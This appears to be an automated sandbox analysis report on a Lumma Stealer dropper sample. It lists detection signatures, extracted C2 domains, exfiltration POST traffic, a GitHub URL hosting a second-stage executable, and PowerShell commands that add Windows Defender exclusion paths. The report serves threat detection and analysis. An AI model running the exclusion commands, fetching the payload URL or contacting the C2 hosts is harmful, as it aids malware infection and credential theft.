
Windows Analysis Report
OiMp3TH.exe

Overview

General Information

Sample name: OiMp3TH.exe
Analysis ID: 1581343
MD5: ab408f4eb577eda6d98941ede1b44863
SHA1: 95035cc5625641877753b56595972972732a7163
SHA256: a3489b28d0560fdb0bb7ab3191ee01e051f96bb4ebb0d979cea7976ebab5139f
Tags: exe, malware, trojan, user-Joker

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • OiMp3TH.exe (PID: 4744 cmdline: "C:\Users\user\Desktop\OiMp3TH.exe" MD5: AB408F4EB577EDA6D98941EDE1B44863)
    • powershell.exe (PID: 6088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Extracted malware configuration (LummaC): {"C2 url": ["cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "prisonyfork.buzz"], "Build id": "nbYRKl--"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OiMp3TH.exe", ParentImage: C:\Users\user\Desktop\OiMp3TH.exe, ParentProcessId: 4744, ParentProcessName: OiMp3TH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', ProcessId: 6088, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OiMp3TH.exe", ParentImage: C:\Users\user\Desktop\OiMp3TH.exe, ParentProcessId: 4744, ParentProcessName: OiMp3TH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', ProcessId: 6088, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T13:11:07.221826+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:09.447823+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:12.014251+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:15.042052+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:17.342320+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:19.972669+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:22.467303+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49733 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:27.031637+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49744 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:08.213577+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:10.224644+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:28.083267+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:08.213577+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:10.224644+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:15.889620+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49713 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:22.470686+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 172.67.216.236 | 443 | TCP


AV Detection

Source: https://hummskitnj.buzz/api; Avira URL Cloud: Label: malware
Source: https://hummskitnj.buzz:443/api; Avira URL Cloud: Label: malware
Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe; Avira: detection malicious, Label: HEUR/AGEN.1314134
Source: ghhqoznpon_638708802577261661.exe.6396.7.memstrmin; Malware Configuration Extractor: LummaC {"C2 url": ["cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "prisonyfork.buzz"], "Build id": "nbYRKl--"}
Source: OiMp3TH.exe; Virustotal: Detection: 25%
Source: OiMp3TH.exe; ReversingLabs: Detection: 18%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe; Joe Sandbox ML: detected
Source: OiMp3TH.exe; Joe Sandbox ML: detected
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: hummskitnj.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: cashfuzysao.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: appliacnesot.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: screwamusresz.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: inherineau.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: scentniej.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: rebuildeso.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: prisonyfork.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: hummskitnj.buzz
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: - Screen Resoluton:
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: Workgroup: -
Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmp; String decryptor: nbYRKl--
Source: unknown; HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: OiMp3TH.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Dan\source\repos\pthkkad\pthkkad\obj\Debug\pthkkad.pdb source: OiMp3TH.exe

Networking

Source: Network traffic; Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49706 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49707 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49713 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49744 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49733 -> 172.67.216.236:443
Source: Malware configuration extractor; URLs: cashfuzysao.buzz
Source: Malware configuration extractor; URLs: inherineau.buzz
Source: Malware configuration extractor; URLs: scentniej.buzz
Source: Malware configuration extractor; URLs: appliacnesot.buzz
Source: Malware configuration extractor; URLs: screwamusresz.buzz
Source: Malware configuration extractor; URLs: rebuildeso.buzz
Source: Malware configuration extractor; URLs: hummskitnj.buzz
Source: Malware configuration extractor; URLs: prisonyfork.buzz
Source: global traffic; HTTP traffic detected: GET /arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 185.199.108.133
Source: Joe Sandbox View; IP Address: 172.67.216.236
Source: Joe Sandbox View; IP Address: 20.233.83.145
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 172.67.216.236:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49744 -> 172.67.216.236:443
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: hummskitnj.buzz
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 42 | Host: hummskitnj.buzz
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UP3JMVGJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12770 | Host: hummskitnj.buzz
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VSOVDR18VE0E | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15036 | Host: hummskitnj.buzz
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6UO45FHKF17435X | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20544 | Host: hummskitnj.buzz
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2MG8UBTKWIZSJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1260 | Host: hummskitnj.buzz
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=97FF7KQWH025 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 588978 | Host: hummskitnj.buzz
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: hummskitnj.buzz
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: github.com
Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic; DNS traffic detected: DNS query: hummskitnj.buzz
Source: unknown; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: hummskitnj.buzz
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336785101.000000000073E000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://github.com
Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://github.comd
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: OiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubusercontent.com
Source: OiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubusercontent.comd
Source: OiMp3TH.exe, 00000000.00000002.4461284237.0000000003231000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000001058000.00000040.00000001.01000000.00000007.sdmp; String found in binary or memory: http://www.enigmaprotector.com/
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmp; String found in binary or memory: http://www.enigmaprotector.com/openU
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.c.lencr.org/0
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.i.lencr.org/0
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032C4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com
Source: OiMp3TH.exe; String found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://hummskitnj.buzz/
